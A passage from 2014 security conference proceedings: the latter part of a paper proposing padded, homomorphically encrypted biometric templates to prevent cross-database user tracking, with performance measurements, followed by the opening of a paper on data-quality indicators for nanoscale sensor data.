[Figure 2 depicts the authentication process: the authentication user presents a biometric probe; the verifier derives a feature vector and compares it against the authentication data (name, department, security level, ID, ...) stored in the encrypted DBS, yielding a decision.]
Figure 2. Authentication Process with Encrypted Database, adapted from [8]
IV. EXTENDING SECURE SIMILARITY VERIFICATION
There exist many biometric authentication systems, which use quite different biometric modalities. Another aspect in this domain is the quality of systems with respect to accuracy and security. To some extent, both properties rely on the trait itself. So, a system that uses only a small set of features with low quality is expected to have overlapping features for different users. Because systems often have more than one server, use different key pairs, and can mix the order of users between systems, one might assume that user tracking is not possible. We introduce the padded biometrics approach, which allows user authentication in a multiple-participant scenario with respect to privacy preservation. Additionally, we present performance impacts and a brief discussion of security impacts.
A. The Padded Biometrics Approach
In Figure 3, we depict a scenario for user tracking with two database systems (DBS). We assume an attacker has read access to both databases. The differences between the two DBS are the key pairs and the user IDs. Assume that, with some knowledge, the attacker identifies User 1 in DBS1. The DBS uses an unsalted asymmetric encryption, which, for a given key and plaintext value, always results in the same cipher value. Within DBS1, the attacker finds the exact same value for another user (User 5). With the help of this knowledge, both users can be identified in DBS2. Because the feature vectors are not shuffled, the attacker needs to identify a match between two users in DBS2 with an overlap of the same two features.
[Figure 3 shows example cipher values for Users 1 and 5 in DBS 1 and Users 7 and 14 in DBS 2; identical cipher values recurring across entries (e.g., 965gt4mk0 and hdt3loqy0) allow the attacker to link users across both systems.]
Figure 3. User Tracking in a Multiple DBS Setup, adapted from [8]
In practice, for a proper biometric trait with an appropriate resolution, this scenario is implausible. As an example, take iris codes with a 2,048-bit representation of the iris features; theoretically, there exist more than 10^74 different codes. However, the Euclidean vector space is very sparsely populated due to clustering of iris codes. Such clustering occurs in many biometric modalities. Therefore, our example, given in Figure 3, is a result of exact matches for different feature vectors. Correlations of biometric features are the main reason for such clusters. Daugman [21] identifies each iris phase code bit to be 0 or 1 with nearly equal probability. This results in a Hamming distance with a very small variance. Daugman uses 249 different features and obtains µ = 0.499 and σ = 0.0317. There exist several other analogous examples, e.g., in face recognition the distributions of eyes, nose, and mouth are quite similar for every person. We conclude that it is very likely that the data in the feature space are not equally distributed.
With these insights or domain knowledge, it is possible to link users or even track users, as in our example in Figure 3. Including the metadata of the database enables further possibilities for an information gain, e.g., in the case that an index structure relates similar values, such as the R-tree [22] or the Pyramid technique [23].
We propose a padding approach, comparable to salting. In Figure 4, we show the idea. Every user receives a specific ID (UID). This ID is encrypted together with the template, e.g., by concatenating the ID and the biometric feature. This approach also allows including the feature index (FID) in the pad, which avoids intra-user overlapping.
[Figure 4 shows the composition of a padded feature: a leading pad consisting of the UID and the FID is prepended to the biometric feature before encryption.]
Figure 4. Lead-Pad for Biometric Features, adapted from [8]
The resulting value of a pad and a biometric feature has to be encrypted. A leading pad avoids any inter- and intra-user redundancies. At the same time, the possibility of the attack described above is close to zero. The padding, seen as a security layer, can either be maintained by the user or operated by an additional participant who holds the pads and IDs. This proposal comes at the cost that identification is expected to be more difficult. The pad shifts features semantically away from others. Therefore, the Euclidean measurements for similarity cannot be used directly; instead, the complete set of pads for each person has to be processed. We concentrate on the performance of our proposed approach in the following.
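The lead-pad construction can be sketched as a simple bit-level concatenation. The field widths below (16-bit features, 8-bit FID) are illustrative assumptions of ours, not values from the paper:

```python
def pad_feature(uid: int, fid: int, feature: int,
                feature_bits: int = 16, fid_bits: int = 8) -> int:
    """Prepend a leading pad (UID and feature index FID) to a biometric feature.

    The pad occupies the high-order bits, the raw feature the low-order bits,
    so identical raw features map to distinct plaintexts per user and position.
    """
    assert feature < (1 << feature_bits) and fid < (1 << fid_bits)
    return (uid << (fid_bits + feature_bits)) | (fid << feature_bits) | feature

# Identical raw features for two users (or two positions) yield distinct
# plaintexts, so even a deterministic encryption of the padded value
# no longer leaks equality between entries.
a = pad_feature(uid=1, fid=3, feature=0x2A5C)
b = pad_feature(uid=5, fid=3, feature=0x2A5C)   # same feature, different user
c = pad_feature(uid=1, fid=7, feature=0x2A5C)   # same user, different position
assert len({a, b, c}) == 3
```

In the actual scheme, the padded value would subsequently be encrypted with the Paillier public key before being stored in the DBS.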
B. Performance of the Pad Approach in the DBS
Index methods are widely used in DBMS to increase performance [24]. In relational databases, the B-tree [25] [26] and variants, such as the B+-tree, are used to achieve logarithmic lookup performance. A similarity search using B+-trees additionally results, on average, in a linear performance overhead. Including a verifier, as proposed for an encrypted data domain, influences the processing time due to transportation effort. We discuss pros and cons in the following.
TABLE I. PERFORMANCE IN A DATABASE SYSTEM COMPARED TO THE PADDING APPROACH

Query Type        | DBS with B+-tree | Padding DBS
Exact Match       | O(log(n))        | O(n)
Similarity Search | O(n)             | O(n)
Sorting and the use of metadata, which can improve query response times, should be avoided for security reasons. This requirement is in contrast to the index structures typically used in relational data management systems. Therefore, the identification within the authentication process requires linear computational effort. Depending on the size and the application scenario, different metadata, such as gender, can be utilized to limit this effort. Note that if small subsets can be created from this metadata, it is necessary to separate these from the biometrics. Alternatively, the padding approach can be applied to non-biometric data, too. In Table I, we summarize the computational efforts for a relational database and for a database with encryption using our padding approach. Due to several other possible performance impacts, such as database size, feature size, thresholds, or key bit-length, we present a short evaluation study in Section V.
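The O(n) exact-match cost from Table I can be illustrated as follows: with per-user pads, the probe must be re-padded and encrypted once for every enrolled user before comparison, so no value-based index can prune candidates. The toy deterministic cipher below only stands in for the padded encryption and is purely our own illustration:

```python
def identify_with_pads(raw_feature, pad_dict, encrypt, db):
    """Exact-match identification with per-user pads degenerates to a linear
    scan: each enrolled user's pad produces a different plaintext, so the
    probe must be padded and encrypted separately per user."""
    return [uid for uid, pad in pad_dict.items()
            if db.get(uid) == encrypt(pad + raw_feature)]

# Toy deterministic cipher for illustration only (a real system would use
# the padded Paillier encryption from Section III).
toy_encrypt = lambda m: (m * 2654435761) % (1 << 32)

pads = {1: 10_000, 2: 20_000, 3: 30_000}
db = {uid: toy_encrypt(pad + 123) for uid, pad in pads.items() if uid != 2}
db[2] = toy_encrypt(pads[2] + 999)   # user 2 enrolled a different feature

assert identify_with_pads(123, pads, toy_encrypt, db) == [1, 3]
```

A B+-tree over the stored ciphertexts cannot help here, because the value being looked up differs per candidate user; hence the linear column for the padding DBS in Table I.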
1) Implementation Issues: We propose to use a distance result from the verifier instead of a binary decision of acceptance or decline of an authentication attempt. This opens a reasonable attack scenario, in which an attacker learns from accepted authentications through repeated authentication queries; this risk can be reduced by disabling repeated authentications. In our approach, the quality of the similarity can be computed in an evaluation step. We apply the following formula:
d(X, Y) = ( Σ_{i=1}^{dim} |x_i − y_i|^a ) / ( τ^a · dim )    (2)
with threshold τ, a ≥ 1 as degree of freedom, and dim as the dimensionality of the feature vector. These parameters are important for adjusting the quality regarding sensor accuracy, error rates, and the biometric trait. The better the quality, the lower τ and the larger a can be.
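Formula (2) can be written directly in Python. The function name and the acceptance rule (accept when the normalized distance does not exceed 1, i.e., the average per-dimension deviation stays within τ) are our own illustration:

```python
def normalized_distance(X, Y, tau: float, a: int = 1) -> float:
    """Normalized distance from Eq. (2): sum of |x_i - y_i|^a over tau^a * dim."""
    assert len(X) == len(Y) and a >= 1 and tau > 0
    dim = len(X)
    return sum(abs(x - y) ** a for x, y in zip(X, Y)) / (tau ** a * dim)

# Identical vectors have distance 0; a uniform deviation of exactly tau
# per dimension yields a normalized distance of 1.
assert normalized_distance([1, 2, 3], [1, 2, 3], tau=3) == 0.0
assert normalized_distance([1, 2, 3], [2, 3, 4], tau=3) <= 1.0
```

Raising a penalizes large per-dimension deviations more strongly, which matches the remark that higher-quality signals allow a larger a.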
We use a dictionary to maintain all pads for all enrolled users. The pads are delivered via a secure channel for each authentication process and are concatenated with the features before encryption. Since the pads have no relation to personal data, they can be generated randomly. The necessary step before enrollment or authentication is adding the pad. Note that it is not necessary to add the pad before the signal. Within an identification process, it is necessary to look up the pad of a user in the dictionary. If the dictionary is outsourced to an external server, an increase in processing time has to be expected.
In the following, we consider the three-participant approach among the system architectures from Section III. We measure the influence on computation time regarding all three involved participants. Note that if participants are embedded, as described in Section III, special security requirements have to be met. The three participants consist of a user, a verifier, and the DBS, which maintains the encrypted templates. Biometrics are captured by a sensor at the user side. The verifier is responsible for authentication. Note that communication channels can be realized in different ways, e.g., insecure or encrypted. In the case that only the user stores all pads and the corresponding IDs, the verifier and the DBS do not need to be fully trusted. Hill-climbing should be avoided; therefore, repeated authentication attempts from single users have to be disabled. As a result, we can sum up that, applying our approach to this scenario, only the user and partly the server gain information on the claimed identity. The ability to learn from the results can only be realized on the user or verifier side. There is no plain information available, due to encryption at the user side within the complete process.
C. Security Impacts
In our experiments, we do not focus on cryptanalysis. Since data are kept in the DBS, it is a promising entry point to gain information. A careful design and a proper security concept are mandatory. The implementation can introduce vulnerabilities into the protocol that lead to information leakage. There are also attacks that do not immediately address the protocol; for instance, attacks on availability and on the endpoints should be carefully considered.
An attacker can try to take advantage of a vulnerability that originates from poor system design. For example, a system designer decides to embed the verifier at the user side, but does not take all steps to guarantee confidentiality. If an unauthorized user is able to listen to the verifier, an information leakage occurs.
If our padding approach is implemented inappropriately, e.g., without secure separation from unauthorized users, and an attacker gains access to the pads, the confidentiality is at risk. With access to the pads and the encrypted signal, known-plaintext attacks [27] are possible.
The asymmetric Paillier cryptosystem is not information-theoretically secure. Thus, there are threats leading to leakage of the biometric templates in the DBS. We introduce the padding approach to reduce the opportunity for such attacks. Note that a secure dictionary is mandatory. The implementation of a system can introduce various security vulnerabilities that enable an attacker to gain protected information. It is mandatory to implement a proper pseudonymization approach in combination with a secure dictionary.
The configuration of a system is presumably the most promising path for an attacker. The amount and type of meta-information in the DBS can be a threat to security, so system designers have to consider meta-information carefully. Additionally, backups play an important role. With access to both the DBS and a backup, an attacker can compare users between the backup and the current state for user tracking.
The acceptance threshold and quality classes influence the false acceptance and false rejection rates. The threshold decides on the size of tolerated error patterns. There are many additional factors: the level of information confidentiality, the quality of the signals, the access frequency, the expectations regarding response times, and combined biometrics.
If the authentication protocol uses web communication, a denial-of-service (DoS) attack can prevent the protocol from functioning and harms availability. Even without using the web, there are other possible attacks that do not only take advantage of communication. For instance, using malware to prevent participants from following the protocol is an imaginable attack on availability. Assuming that a biometric authentication scheme applies the four-participant scenario, a DoS attack on a single participant would prevent the system from functioning. It is possible to reduce this threat, but impossible to prevent it completely.
Endpoint security is crucial to provide confidentiality, especially if users have access to secret keys. Even if the secret key is not easily accessible, an attacker can try to read parts of the communication. This includes plain and encrypted data such as the pads. With access to these data, follow-up attacks such as known-plaintext or known-ciphertext attacks [27] are possible. To restrict these, basic security measures, including anti-virus software and firewalls, should be implemented.
V. EVALUATION
In this section, we present evaluation results on the performance of our approach, using processing time as the performance metric. We present experiments regarding different influence factors, such as the number of enrolled users, the key length, the feature vector dimensionality, and the threshold. Firstly, we explain the evaluation setting. Secondly, we show the results of our performance evaluation with respect to enrolled users, key length, feature dimensions, and threshold by studying the with- and without-padding approaches as well as encrypted versus non-encrypted scenarios.
A. Experimental Layout
For our evaluation, we use a MySQL database, version 5.5.27. We restrict our evaluation to a two-table layout with index structures as follows:
• Person(Name, Security level, Department, ID)
• Biometrics(Feature, ID, BID).
Every enrolled person in the system has some attributes, i.e., a name, a security level, and a department. These attributes can be exchanged or extended by any property. In addition, every person has an ID to find a data tuple unambiguously. All properties such as name, security level, and department are encrypted with the public key. Biometrics are divided by the number of dimensions of the Euclidean vector. Every feature is identified by a biometric ID (BID), while biometrics are assigned to the corresponding person by the ID.
We make the following assumptions: The DBS is designed such that it can be used for the most common discrete biometric features. The resolution or the quality of the feature has no influence on the operative readiness of the biometric system itself. How accurate the resolution has to be is a question of acceptable error rates and needs to be adjusted for the corresponding use case. Features are saved in feature vectors and have at least one dimension, but can have as many dimensions as needed. Everything that depends on the dimensionality of the feature vector grows correspondingly with its size. For example, the codebooks depend on the size of the feature vector.
B. Performance Evaluation
We perform all experiments on an AMD Phenom II X6 1055T processor with an SSD and 8 GB RAM. In our evaluation, we focus on response time as the crucial performance factor. We apply 10 replications per evaluation run for validity. We use artificial data generated i.i.d. from a Gaussian distribution.
TABLE II. PERFORMANCE FOR USERS

Users   | Identification in ms | Verification in ms
20      | 35                   | 87
1,000   | 63                   | 107
100,000 | 354                  | 354
First, we test the influence of the number of enrolled users. Note that, for simplicity, the feature length is 11 dimensions, the key size is 64 bit, and the threshold is 3. In Table II, we present the arithmetic means for identification and verification with our padding approach. Our results indicate that the overall processing time increases with a higher number of enrolled users. This growth seems linear. Memory management and thread scheduling as well as configuring and running the DBS cause this increase. Since verification only requires the data of one person, the increase is not similar to identification. Due to the B+-trees in MySQL, there is an increasing impact according to the number of enrolled users.
TABLE III. PERFORMANCE FOR KEY LENGTH

Key Length | Identification in ms | Verification in ms
64         | 63                   | 107
128        | 112                  | 87
512        | 1,001                | 400
1,024      | 6,933                | 2,188
In Table III, we present results regarding the key length. Note that we use 1,000 enrolled users in the DBS and a feature dimensionality of 11. As expected, an exponential growth with an increase of the key length is obvious. This growth might additionally be influenced by our experimental setup (using one machine for all tasks). However, using the private key increases the processing time only by a small amount. Fast feedback is a requirement for user acceptance of biometric authentication.
We test different feature vector sizes (11, 69, 100, 250, and 2,048) and present the results in Table IV. Adding new features to the feature vectors requires more comparisons, which results in higher response times. Note that with an increase of the feature vector size, the codebooks also grow; this explains the growth even for smaller feature vectors.
As a last evaluation parameter, we vary the threshold from 3 to 1,000 and present our results in Table V. The threshold parameter is used for quality reasons; see Section IV. Compared
TABLE IV. FEATURE DIMENSIONS PERFORMANCE

Feature Dimensions | Identification in ms | Verification in ms
11                 | 63                   | 56
69                 | 239                  | 81
100                | 354                  | 321
250                | 693                  | 571
2,048              | 1,065                | 860
TABLE V. PERFORMANCE FOR THRESHOLD

Threshold | Identification in ms | Verification in ms
3         | 125                  | 99
5         | 199                  | 104
10        | 216                  | 114
100       | 280                  | 208
1,000     | 1,572                | 1,311
to [18], increasing the threshold by 1 means that two additional comparisons have to be computed per enrolled user. Therefore, the effort increases linearly with the threshold, scaled by the number of enrolled users. Signals with a higher fluctuation, which require a larger range of validity, require more processing time. This has to be examined for each application and evaluated regarding hardware, requirements, and accuracy.
TABLE VI. PERFORMANCE OF THE PADDING APPROACH COMPARED TO [18]

System Parameters                   | Padding Approach in ms | Without Pad in ms
1,000 users, 2,048 features, 64 bit | 25,546                 | 26,014
1,000 users, 11 features, 1,024 bit | 28,033                 | 27,197
100,000 users, 11 features, 64 bit  | 35,009                 | 35,403
As a concluding remark, we present our evaluation results for our approach compared to the approach presented in [18]. In Table VI, we show three different parameter scenarios as examples. This table shows unexpected results: in the first and third experiments, the response times for the padding approach are slightly lower than without padding. This might be a result of caching and optimizations that take place during the experiments. However, our results show that the influence of our approach is negligible.
TABLE VII. COMPARISON OF SECURE IDENTIFICATION

Enrolled Users | Encrypted Identification | Unencrypted Identification
20             | 35 ms                    | 26 ms
1,000          | 63 ms                    | 47 ms
100,000        | 354 ms                   | 310 ms
In the last setting, we show the differences between encrypted and unencrypted identification in Table VII. We again use a key length of 64 bit and 11 feature dimensions; the threshold is set to 3. The results show the cost of encryption. Note that the computational effort for encryption is very small due to the very short key length. With an increase of the key length, the difference between both scenarios increases dramatically.
VI. SUMMARY AND OUTLOOK
In this paper, we present an extension to the secure similarity verification between homomorphically encrypted signals by Rane et al. [17], [18]. In the original scenario, tracing users is possible. We present a padding approach to overcome this challenge. We extend the original contribution to search on encrypted values and to use a one-time-pad concept. Furthermore, we conduct an evaluation study of our conceptual design to evaluate our approach.
With the padding approach, an advanced search in an encrypted domain is possible. However, if repeated authentication attempts are possible, it is already possible to gain information regarding the template. One can avoid such template reproduction by disabling repeated authentications. Our approach improves data security, and we name some security requirements for this purpose.
The processing times in our evaluation reveal that our padding approach comes at very low additional cost compared to [18]. This is an important aspect for the user acceptance of such a system. Whereas the number of enrolled users has a logarithmic impact on the computational effort, the key length has an exponential impact. The dimensionality of the feature vector has a logarithmic influence as well, and the threshold contributes linearly to the computational effort. All these parameters do not drastically influence the system of Rane [18]. Due to simple operations, such as summation and absolute-value computation, the computational overhead is negligible. However, the concept of privacy-preserving authentication discussed in this paper has a strong influence on the computational effort compared to plain-text biometric authentication systems.
In future work, our approach can be adapted to other domains. We propose to semantically shift data to complicate unauthorized decryption attempts, which makes user tracing via duplicate identification unlikely. This becomes particularly important if the co-domain of the biometric feature is smaller than the co-domain of the key. The approach presented in [28] verifies users in the encrypted domain; it is imaginable that our extensions are of interest for this approach, too, which is based on the homomorphic RSA cryptosystem.
ACKNOWLEDGMENT
We thank Martin Schäler for fruitful discussions on the first draft of this paper. The work in this paper has been funded in part by the German Federal Ministry of Education and Research (BMBF) through the Research Program "DigiDak+ Sicherheits-Forschungskolleg Digitale Formspuren" under Contract No. FKZ: 13N10816 and 13N10818.
REFERENCES
[1] A. Grebhahn, M. Schäler, and V. Köppen, “Secure deletion: Towards
tailor-made privacy in database systems,” in BTW-Workshops. KöllenVerlag, 2013, pp. 99–113.
[2] A. Grebhahn, M. Schäler, V. Köppen, and G. Saake, “Privacy-aware
multidimensional indexing,” in BTW. Köllen-Verlag, 2013, pp. 133–
147.
[3] C. Vielhauer, Biometric User Authentication for IT Security, ser. Advances in Information Security. Springer, 2006, no. 18.
[4] M. Schäler, A. Grebhahn, R. Schröter, S. Schulze, V. Köppen, and
G. Saake, “QuEval: Beyond high-dimensional indexing à la carte,”
PVLDB, vol. 6, no. 14, 2013, pp. 1654–1665.
[5] F. Emekci, O. Sahin, D. Agrawal, and A. E. Abbadi, “Privacy preserving
decision tree learning over multiple parties,” DKE, vol. 63, no. 2, 2007,
pp. 348 – 361.
[6] A. Inan, Y. Saygyn, E. Savas, A. Hintoglu, and A. Levi, “Privacy preserving clustering on horizontally partitioned data,” in Data Engineering
Workshops, 2006. Proceedings. 22nd International Conference on, 2006,
pp. 95–95.
[7] D. Shah and S. Zhong, “Two methods for privacy preserving data mining
with malicious participants,” Information Sciences, vol. 177, no. 23,
2007, pp. 5468–5483.
[8] M. Leuckert, "Evaluation and extension of secure similarity verification in multi-computer scenarios to securely store and communicate biometric data," Master's thesis, Otto-von-Guericke University, 2013.
[9] P. Paillier, “Public-key cryptosystems based on composite degree residuosity classes,” in EUROCRYPT, ser. Lecture Notes in Computer Science,
J. Stern, Ed., vol. 1592. Springer, 1999, pp. 223–238.
[10] C. Vielhauer, J. Dittmann, and S. Katzenbeisser, “Design aspects of
secure biometric systems and biometrics in the encrypted domain,” in
Security and Privacy in Biometrics, P. Campisi, Ed. Springer, 2013,
pp. 25–43.
[11] S. Kiltz, A. Lang, and J. Dittmann, “Taxonomy for computer security
incidents,” in Cyber Warfare and Cyber Terrorism. IGI Global, 2008,
pp. 412–417.
[12] S. Hildenbrand, D. Kossmann, T. Sanamrad, C. Binnig, F. Faerber, and
J. Woehler, “Query processing on encrypted data in the cloud,” Systems
Group, Department of Computer Science, ETH Zurich, Tech. Rep., 2011.
[13] A. Juels and M. Wattenberg, “A fuzzy commitment scheme,” in 6th
ACM Conference on Computer and Communications Security. New
York, NY, USA: ACM, 1999, pp. 28–36.
[14] A. Juels and M. Sudan, “A fuzzy vault scheme,” Designs, Codes and
Cryptography, vol. 38, no. 2, 2006, pp. 237–257.
[15] A. K. Jain, A. Ross, and U. Uludag, "Biometric template security: Challenges and solutions," in Proceedings of the European Signal Processing Conference, 2005.
[16] C. Gentry, “Computing arbitrary functions of encrypted data,” Commun.
ACM, vol. 53, no. 3, 2010, pp. 97–105.
[17] S. Rane, W. Sun, and A. Vetro, “Secure similarity verification between
encrypted signals,” US Patent US20 100 246 812 A1, Sep. 30, 2010.
[18] ——, “Secure similarity verification between homomorphically encrypted signals,” US Patent US8 249 250 B2, Sep. 30, 2012.
[19] P. Stahlberg, G. Miklau, and B. N. Levine, “Threats to privacy in
the forensic analysis of database systems,” in Proceedings of the 2007
ACM SIGMOD International Conference on Management of Data, ser.
SIGMOD ’07. New York, NY, USA: ACM, 2007, pp. 91–102.
[20] A. Grebhahn, D. Broneske, M. Schäler, R. Schröter, V. Köppen, and
G. Saake, “Challenges in finding an appropriate multi-dimensional
index structure with respect to specific use cases,” in Proceedings
of the 24th GI-Workshop ”Grundlagen von Datenbanken 2012”,
I. Schmitt, S. Saretz, and M. Zierenberg, Eds. CEUR-WS,
2012, pp. 77–82, urn:nbn:de:0074-850-4. [Online]. Available: http:
//ceur-ws.org/Vol-850/paper grebhahn.pdf
[21] J. Daugman, “How iris recognition works,” IEEE Trans. on Circuits and
Systems for Video Technology, vol. 14, no. 1, 2004, pp. 21–30.
[22] A. Guttman, “R-trees: A dynamic index structure for spatial searching,”
SIGMOD Rec., vol. 14, no. 2, 1984, pp. 47–57.
[23] S. Berchtold, C. Böhm, and H.-P. Kriegel, “The Pyramid-technique:
Towards breaking the curse of dimensionality,” SIGMOD Rec., vol. 27,
no. 2, 1998, pp. 142–153.
[24] V. Köppen, M. Schäler, and R. Schröter, “Toward variability management to tailor high dimensional index implementations,” in RCIS. IEEE,
2014, pp. 452–457.
[25] R. Bayer and E. McCreight, “Organization and maintenance of large
ordered indexes,” Acta Informatica, vol. 1, 1972, pp. 173–189.
[26] D. Comer, “The Ubiquitous B-Tree,” ACM Comput. Surv., vol. 11, no. 2,
1979, pp. 121–137.
[27] B. Schneier, Secrets & Lies: Digital Security in a Networked World.
New York, NY, USA: John Wiley & Sons, Inc., 2000.
[28] M. Upmanyu, A. M. Namboodiri, K. Srinathan, and C. V. Jawahar, “Efficient biometric verification in encrypted domain,” in 3rd International
Conference on Advances in Biometrics, 2009, pp. 899–908.
117
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Data Quality and Security Evaluation Tool for Nanoscale Sensors
Leon Reznik
Department of Computer Science
Rochester Institute of Technology
Rochester, New York, USA
e-mail: lr@cs.rit.edu

Sergey Edward Lyshevski
Department of Electrical and Microelectronic Engineering
Rochester Institute of Technology
Rochester, New York, USA
e-mail: Sergey.Lyshevski@mail.rit.edu
Abstract— The paper proposes a novel approach to data and information management in multi-stream data collection systems with heterogeneous data sources. Data may be produced by novel nanoscale photonic, optoelectronic and electronic devices, for which poor quality characteristics are expected. In the proposed approach, we associate a set of data quality indicators with each data entity and develop a calculus that integrates various data quality (DQ) indicators, ranging from traditional data accuracy metrics to network security and business performance measures. The integral indicator calculates the DQ characteristics at the point of data use instead of the conventional point of origin. The DQ metrics composition and calculus are discussed. The tools developed to automate the metrics selection and the calculus procedures for DQ integration are presented, and their user-friendly interactive capabilities are illustrated.
Keywords - data quality; computer security evaluation; data accuracy; data fusion.

I. INTRODUCTION

Recently we entered a new era of exponential growth of the data collected and made available for various applications. The existing technologies are not able to handle such large amounts of data; this phenomenon has been called big data. Photonics- and nanotechnology-enabled microsystems perform multiple generations and fusions of multiple data streams of varying data quality [1-6]. The development and application of quantum-mechanical nanoscale electronic, photonic and photoelectronic communication, sensing and processing devices significantly increases the amount of data that can be measured and stored. These organic, inorganic and hybrid nanosensors operate on a few photons, electrons and photon-electron interactions [1, 2, 4, 6]. Very low current and voltage, high noise, large electromagnetic interference, perturbations, dynamic non-uniformity and other adverse features result in heterogeneous data with high uncertainty and poor quality. The super-large-density quantum and quantum-effect electronic, optoelectronic and photonic nanodevices and waveguides are characterized by: (i) extremely high device switching frequency and data bandwidth (~1000 THz); (ii) superior channel capacity (~10^13 bits); (iii) low switching energy (~10^-17 J) [7, 8].

The importance of DQ analysis, data enhancement and optimization is emphasized due to: (1) low signal-to-noise ratio (the ratio of mean to standard deviation of measured signals is ~0.25 in the emerging electron-photon interaction devices); (2) high probability of errors (p ~0.001); (3) high distortion measure, reaching ~0.1 to 0.3; (4) dynamic response and characteristic non-uniformity. These characteristics must be measured, processed, evaluated and provided to the data user along with the data.

New generations of information systems provide communication and networking capabilities to transfer, fuse, process and store data. Various applications require data delivery from the point of origin to the point of use, which might be far away. The data transfer may lead to information losses, attenuation, distortions, errors, malicious alterations, etc. Security, privacy and safety aspects of data communication and processing systems nowadays play a major role and may have a dramatic effect on the quality of the data delivered. New DQ management methods, quality evaluation and assurance (QE/QA) tools, and robust algorithms are needed to ensure security, safety, robustness and effectiveness. As the amount of available data multiplies every year, current information systems are not capable of processing these large data arrays to make the best decisions. Big data applications require better selection of high-quality inputs. The absence of DQ indicators provided along with the data hinders the recognition of potential calamities and makes data fusion and mining procedures, as well as decision making, prone to errors.

In this paper, we offer a novel approach to data management in information systems. We propose to associate DQ indicators with each data entity and to replace one-dimensional data processing and delivery with multi-dimensional data processing and delivery along with the corresponding DQ indicators. To realize this approach, we describe the structure and content of these DQ indicators, develop the calculus for processing them, and develop interactive tools to automate this process. The current situation in DQ research is described in Section II. The DQ metrics composition is presented in Section III, while the DQ calculus is reported in Section IV. The CAD tools are documented in Section V. The conclusions are outlined in Section VI.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
II. CURRENT ENVIRONMENT AND ACHIEVEMENTS IN DQ EVALUATION
DQ represents an open multidisciplinary research problem, involving advancements in computer science, engineering and information technologies. The studied problems are directly applicable in a variety of domains, and it is essential to develop technologies and methods to manage, ensure and enhance the quality of data. Related research in the networking field investigates how network characteristics, standards and protocols affect the quality of data collected and communicated through networks. In sensor networks, researchers have started to investigate how to incorporate DQ characteristics into sensor-originated data [9]. Guha et al. proposed a single-pass algorithm for high-quality clustering of streaming data and provided the corresponding empirical evidence [10]. Bertino et al. investigated approaches to assuring data trustworthiness in sensor networks based on game theory [11] and provenance [12]. Chobsri et al. examined the transport capacity of a dense wireless sensor network and the compressibility of data [13]. Dong and Yinfeng attempted to optimize the quality of collected data in relation to resource consumption [14],[15]. Current developments are based on fusing multiple data sources of varying quality and creating big data collections. Novel solutions and technologies, such as nano-engineering, are emerging to enable DQ assessment. Reznik and Lyshevski outlined the integration of various DQ indicators representing different schemes, ranging from measurement accuracy to security and safety [16], as well as micro- and nano-engineering [17]. The aforementioned concepts are verified, demonstrated and evaluated in various engineering and science applications [18],[19].
III. DQ METRICS COMPOSITION
Data may have various quality aspects, which can be measured. These aspects are also known as data quality dimensions, or metrics. The traditional dimensions, some of which are described in [20],[21], are as follows:

Figure 1. Integral quality evaluation composition

Completeness: Data are complete if they have no missing values. It describes the extent to which every expected characteristic or trait is described and provided.

Timeliness: Timeliness describes the attribute that data are available at the exact instant of their request. If a user requests data and is required to wait a certain amount of time, this delay is known as data lag. It affects the timeliness and is not desirable.

Validity: It determines the degree to which the data conform to a desired standard or set of rules.

Consistency: Data are consistent if they are free from any contradiction. If the data conform to a standard or a rule, they should continue to do so when reproduced in a different setting.

Integrity: Integrity measures how valid, complete and consistent the data are. It is determined by a measure of the whole set of the other data quality dimensions.

Accuracy: Accuracy relates to the correctness of data and measurement uncertainty. Data with low uncertainty are correct.

Relevance: It is a measure of the usefulness of the data to a particular application.

Reliability: The quality of data becomes irrelevant if the data are not obtained from a reliable source. Reliability is a measure of the extent to which one is willing to trust the data.

Accessibility: It measures the timeliness of data access.

Value added: It is measured as the rate of usefulness of the data.
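As an illustration of how such dimensions can be quantified (a hypothetical sketch; the paper does not prescribe specific formulas, and the 60-second lag budget below is an assumption), completeness and timeliness might be computed as:

```python
from datetime import datetime, timezone

def completeness(values):
    """Fraction of expected fields that carry a value (1.0 = no missing values)."""
    if not values:
        return 0.0
    present = sum(1 for v in values if v is not None)
    return present / len(values)

def timeliness(requested_at, delivered_at, max_lag_s=60.0):
    """Score in [0, 1] that decreases linearly with the data lag."""
    lag = (delivered_at - requested_at).total_seconds()
    return max(0.0, 1.0 - lag / max_lag_s)

readings = [3.2, None, 3.1, 3.3]
print(completeness(readings))  # 0.75

t0 = datetime(2014, 11, 16, tzinfo=timezone.utc)
t1 = datetime(2014, 11, 16, 0, 0, 30, tzinfo=timezone.utc)
print(timeliness(t0, t1))      # 0.5
```

Each function returns a normalized score, so dissimilar dimensions can later be combined into one integral indicator.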
The methodologies for evaluating the DQ aspects listed above have been developed over decades. They represent well the quality of the data at their point of origin, at the data source. However, nowadays most data are used far away from their point of origin. In fact, structured data are typically collected by distributed sensor networks and systems, then transmitted over computer and communication networks, processed and stored by information systems, and then used. All these communication, processing and storage tasks affect the quality of the data at the point of use, changing their DQ in comparison to that at the point of origin. The DQ evaluation should therefore integrate the accuracy and reliability of the data source with the security of the computer and communication systems. High quality of the data at their point of origin does not guarantee even an acceptable DQ at the point of use if the communication network security is low and malicious alteration or loss of data has a high probability.

We describe the DQ evaluation structure as a multilevel hierarchical system. In this approach, we combine diverse evaluation systems, even if they vary in their design and implementation. The hierarchical system should be able to produce a partial evaluation of different aspects, which will be helpful in flagging the areas that need urgent improvement.
In our initial design we will classify metrics into five groups
(see Figure 1):
(1) accuracy evaluation;
(2) measurement and reliability evaluation;
(3) security evaluation;
(4) application functionality evaluation;
(5) environmental impact.

While the first three groups include rather generic metrics, groups #4 and #5 are devoted to metrics that are specific to a particular application. Our metrics evaluation is based on existing approaches and standards, such as [22] for measurement accuracy and [23] for system security. Table I gives a sample of generic metrics representing the first three groups, while Table II lists metrics that are considered specific to a particular sensor and application.

TABLE I. SAMPLES OF GENERIC METRICS

Generic Attribute Name | DQ indicator/group (Figure 1) | Description
Time-since-Manufacturing | Maintenance/reliability | The measure of the age of the device
Time-since-Service | Maintenance/reliability | The measure of the days since the last service was performed in accordance with the servicing schedule
Time-since-Calibration | Calibration/reliability | The measure of the days since the last calibration was performed in accordance with the calibration schedule
Temperature Range | Application/performance | The measure of the temperature range within which the device provides optimum performance
Physical Tampering Incidences | Physical security/security | The number of reported incidents that allowed unauthorized physical contact with the device
System Breaches | Access control/security | The measure of the number of unauthorized accesses into the system, denial-of-service attacks, improper usage, suspicious investigations, and incidences of malicious code
System Security | Security/security | Measures the presence of intrusion detection systems, firewalls, and anti-viruses
Data Integrity | Vulnerabilities/security | The number of operating system vulnerabilities that were detected
